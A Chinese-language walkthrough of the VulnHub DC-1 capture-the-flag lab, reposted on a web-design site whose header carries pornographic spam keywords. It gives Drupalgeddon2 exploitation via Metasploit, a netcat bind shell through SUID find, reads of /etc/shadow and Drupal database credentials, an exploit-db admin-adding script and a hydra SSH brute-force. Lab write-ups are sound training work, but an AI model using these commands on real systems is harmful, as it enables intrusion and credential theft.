欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

VulnHub測(cè)試靶場(chǎng)DC-1

**

網(wǎng)站建設(shè)哪家好,找成都創(chuàng)新互聯(lián)!專(zhuān)注于網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站建設(shè)、微信開(kāi)發(fā)、重慶小程序開(kāi)發(fā)、集團(tuán)企業(yè)網(wǎng)站建設(shè)等服務(wù)項(xiàng)目。為回饋新老客戶創(chuàng)新互聯(lián)還提供了義馬免費(fèi)建站歡迎大家使用!

IP:192.168.110.212

**

一.arp-scan -l查看同一區(qū)域中存活的主機(jī).
VulnHub測(cè)試靶場(chǎng)DC-1
知道了ip然后我們?cè)L問(wèn)主頁(yè)為下圖:
VulnHub測(cè)試靶場(chǎng)DC-1

先信息搜集使用nmap進(jìn)行端口掃描發(fā)現(xiàn)掃描的端口如下:

22(ssh)  80(http) .   111(rpcbind)
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.MySQL.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35108/tcp6  status
|   100024  1          37240/udp6  status
|   100024  1          37414/udp   status
|_  100024  1          51353/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

版本:
內(nèi)容管理系統(tǒng)(CMS)Drupal7
Web 服務(wù)器 Apache2.2.22
編程語(yǔ)言 PHP5.4.45
操作系統(tǒng) Debian
JavaScript 庫(kù) jQuery1.4.4

二.信息搜集完之后我是先開(kāi)始從https://www.exploit-db.com/?type=webapps這個(gè)根據(jù)他的版本來(lái)進(jìn)行搜索的,但是最后沒(méi)有結(jié)果,最后從主頁(yè)下的手 ,從主頁(yè)看出他的cms是Drupal
之后在網(wǎng)上查的關(guān)于他的漏洞

VulnHub測(cè)試靶場(chǎng)DC-1
三.直接使用msf進(jìn)行查詢(xún)search drupal,因?yàn)橛泻枚啵蚁壤玫氖菚r(shí)間較近的
unix/webapp/drupal_drupalgeddon2模塊
VulnHub測(cè)試靶場(chǎng)DC-1

直接set設(shè)置ip使用run -j,之后直接拿到shell
VulnHub測(cè)試靶場(chǎng)DC-1

輸入python -c 'import pty;pty.spawn("/bin/sh")'
VulnHub測(cè)試靶場(chǎng)DC-1

四.查看他的系統(tǒng)uname -a發(fā)現(xiàn)是linux

Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

之后提權(quán)我是在網(wǎng)上找的方式
現(xiàn)在使用suid進(jìn)行提權(quán)先f(wàn)ind查找
find / -user root -perm -4000 -print 2>/dev/null
發(fā)現(xiàn)Find命令也是以Suid權(quán)限運(yùn)行的話,則將通過(guò)find執(zhí)行的所有命令都會(huì)以root權(quán)限執(zhí)行。

VulnHub測(cè)試靶場(chǎng)DC-1

五.我先自己創(chuàng)建了一個(gè)文本文件然后輸入:find chen -exec whoami \;
VulnHub測(cè)試靶場(chǎng)DC-1

find chen -exec netcat -lvp 5555 -e /bin/sh \;

VulnHub測(cè)試靶場(chǎng)DC-1

六.另一邊進(jìn)行監(jiān)聽(tīng)
VulnHub測(cè)試靶場(chǎng)DC-1

七.提權(quán)成功 我先在etc下面的shadow里面找到的flag4:flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWC
繼續(xù)查看敏感文件/var/www下面找到了1 它提示:每一個(gè)好的CMS都需要一個(gè)配置文件,你也一樣。
VulnHub測(cè)試靶場(chǎng)DC-1

八.所以之后我在網(wǎng)上查了drupal 的配置文件在哪里
/sites/default/settings.php
之后先f(wàn)ind查詢(xún)的

VulnHub測(cè)試靶場(chǎng)DC-1
cat /var/www/sites/default/settings.php 在這塊看到了他的用戶名和密碼

VulnHub測(cè)試靶場(chǎng)DC-1

 'username' => 'dbuser',
 'password' => 'R0ck3t',

既然知道了他的用戶和密碼就可以進(jìn)行連接

九.使用cat 查看他的配置文件里的版本信息

cat /var/www/includes/bootstrap.inc | grep VERSION

VulnHub測(cè)試靶場(chǎng)DC-1

得到VERSION', '7.24
剛開(kāi)始使用searchsploit Drupal都是一些python腳本
VulnHub測(cè)試靶場(chǎng)DC-1

 python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.110.212 -u chen -p chen

VulnHub測(cè)試靶場(chǎng)DC-1

十.從剛剛使用python腳本添加的用戶和密碼來(lái)進(jìn)行登陸

VulnHub測(cè)試靶場(chǎng)DC-1

十一.因?yàn)榍懊嬉呀?jīng)知道他的用戶名(在shadow里面找的用戶名所以現(xiàn)在可以直接拿九頭蛇爆破)

hydra -l flag4 -P pass.txt  ssh://192.168.110.212

VulnHub測(cè)試靶場(chǎng)DC-1

十二.現(xiàn)在可知道他的 密碼為orange
進(jìn)行連接成功!!?。?!

VulnHub測(cè)試靶場(chǎng)DC-1

用戶名:flag4
密碼:orange

標(biāo)題名稱(chēng):VulnHub測(cè)試靶場(chǎng)DC-1
文章起源:http://chinadenli.net/article32/pgocsc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供企業(yè)建站、App設(shè)計(jì)ChatGPT、定制網(wǎng)站App開(kāi)發(fā)、品牌網(wǎng)站設(shè)計(jì)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

成都網(wǎng)站建設(shè)